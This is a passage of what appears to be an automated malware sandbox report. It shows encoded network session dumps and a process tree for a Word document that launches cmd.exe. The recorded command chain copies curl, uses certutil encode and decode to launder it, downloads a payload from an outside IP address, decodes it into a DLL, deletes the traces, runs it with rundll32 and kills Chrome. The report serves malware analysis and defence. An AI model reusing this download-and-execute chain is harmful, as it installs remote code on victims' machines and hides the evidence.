                              2024-07-22 13:59:02 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 41 6b 72 4a 33 43 30 61 49 55 47 72 7a 4a 33 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 66 31 33 32 39 38 33 30 35 34 37 32 38 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: AkrJ3C0aIUGrzJ3f.2Context: a2f132983054728d<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 13:59:02 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 6b 72 4a 33 43 30 61 49 55 47 72 7a 4a 33 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 66 31 33 32 39 38 33 30 35 34 37 32 38 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: AkrJ3C0aIUGrzJ3f.3Context: a2f132983054728d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 13:59:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 13:59:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 36 76 38 64 45 47 73 6a 30 53 57 41 78 66 44 70 52 39 6e 73 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: c6v8dEGsj0SWAxfDpR9nsQ.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination Port
                              8192.168.2.64923340.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:59:31 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 55 6d 36 2f 54 50 45 78 30 61 6b 6e 62 70 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 64 32 32 30 64 31 34 65 37 62 34 30 30 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: 7Um6/TPEx0aknbpA.1Context: d84d220d14e7b400
                              2024-07-22 13:59:31 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 13:59:31 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 37 55 6d 36 2f 54 50 45 78 30 61 6b 6e 62 70 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 64 32 32 30 64 31 34 65 37 62 34 30 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 7Um6/TPEx0aknbpA.2Context: d84d220d14e7b400<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 13:59:31 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 55 6d 36 2f 54 50 45 78 30 61 6b 6e 62 70 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 64 32 32 30 64 31 34 65 37 62 34 30 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 7Um6/TPEx0aknbpA.3Context: d84d220d14e7b400<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 13:59:36 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 13:59:36 UTC58INData Raw: 4d 53 2d 43 56 3a 20 37 77 56 66 37 34 46 61 37 55 53 6a 37 37 74 33 2f 6e 78 2f 48 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: 7wVf74Fa7USj77t3/nx/Hg.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination Port
                              9192.168.2.64926840.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 14:00:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 50 78 72 49 68 63 73 61 6b 75 67 33 33 75 72 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 36 36 64 32 31 35 33 37 66 35 32 62 61 36 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: dPxrIhcsakug33ur.1Context: e366d21537f52ba6
                              2024-07-22 14:00:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 14:00:09 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 64 50 78 72 49 68 63 73 61 6b 75 67 33 33 75 72 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 36 36 64 32 31 35 33 37 66 35 32 62 61 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: dPxrIhcsakug33ur.2Context: e366d21537f52ba6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 14:00:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 50 78 72 49 68 63 73 61 6b 75 67 33 33 75 72 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 36 36 64 32 31 35 33 37 66 35 32 62 61 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: dPxrIhcsakug33ur.3Context: e366d21537f52ba6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 14:00:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 14:00:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4f 79 61 69 6d 42 45 42 74 6b 47 64 6e 6f 49 71 35 42 66 41 59 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: OyaimBEBtkGdnoIq5BfAYg.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination Port
                              10192.168.2.64932540.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 14:01:41 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 52 2f 6b 44 73 6b 4b 41 6e 45 6d 35 59 5a 76 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 31 30 65 63 61 35 38 66 63 61 38 38 31 38 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: R/kDskKAnEm5YZvi.1Context: 6210eca58fca8818
                              2024-07-22 14:01:41 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 14:01:41 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 52 2f 6b 44 73 6b 4b 41 6e 45 6d 35 59 5a 76 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 31 30 65 63 61 35 38 66 63 61 38 38 31 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: R/kDskKAnEm5YZvi.2Context: 6210eca58fca8818<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 14:01:41 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 52 2f 6b 44 73 6b 4b 41 6e 45 6d 35 59 5a 76 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 31 30 65 63 61 35 38 66 63 61 38 38 31 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: R/kDskKAnEm5YZvi.3Context: 6210eca58fca8818<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 14:01:41 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 14:01:41 UTC58INData Raw: 4d 53 2d 43 56 3a 20 53 4b 55 70 4b 7a 71 62 65 30 69 6c 68 78 79 62 70 50 48 45 4f 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: SKUpKzqbe0ilhxybpPHEOg.0Payload parsing failed.


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:09:57:38
                              Start date:22/07/2024
                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                              Imagebase:0x740000
                              File size:1'620'872 bytes
                              MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:09:57:44
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:09:57:44
                              Start date:22/07/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:09:57:44
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\xcopy.exe
                              Wow64 process (32bit):true
                              Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
                              Imagebase:0x430000
                              File size:43'520 bytes
                              MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:11
                              Start time:09:57:44
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\certutil.exe
                              Wow64 process (32bit):true
                              Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
                              Imagebase:0x340000
                              File size:1'277'440 bytes
                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:12
                              Start time:09:57:45
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\certutil.exe
                              Wow64 process (32bit):true
                              Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
                              Imagebase:0x340000
                              File size:1'277'440 bytes
                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:13
                              Start time:09:57:45
                              Start date:22/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\curl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
                              Imagebase:0x860000
                              File size:470'528 bytes
                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:moderate
                              Has exited:true

                              Target ID:14
                              Start time:09:57:49
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\certutil.exe
                              Wow64 process (32bit):true
                              Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
                              Imagebase:0x340000
                              File size:1'277'440 bytes
                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:15
                              Start time:09:57:49
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
                              Imagebase:0xfc0000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:16
                              Start time:09:57:49
                              Start date:22/07/2024
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
                              Imagebase:0x7ff7868b0000
                              File size:71'680 bytes
                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:17
                              Start time:09:57:49
                              Start date:22/07/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
                              Imagebase:0x7ff7a6040000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:09:57:49
                              Start date:22/07/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:09:57:49
                              Start date:22/07/2024
                              Path:C:\Windows\System32\taskkill.exe
                              Wow64 process (32bit):false
                              Commandline:taskkill /F /IM chrome.exe
                              Imagebase:0x7ff6956e0000
                              File size:101'376 bytes
                              MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:09:58:13
                              Start date:22/07/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                              Imagebase:0x7ff684c40000
                              File size:3'242'272 bytes
                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:09:58:13
                              Start date:22/07/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Imagebase:0x7ff684c40000
                              File size:3'242'272 bytes
                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:09:58:15
                              Start date:22/07/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
                              Imagebase:0x7ff684c40000
                              File size:3'242'272 bytes
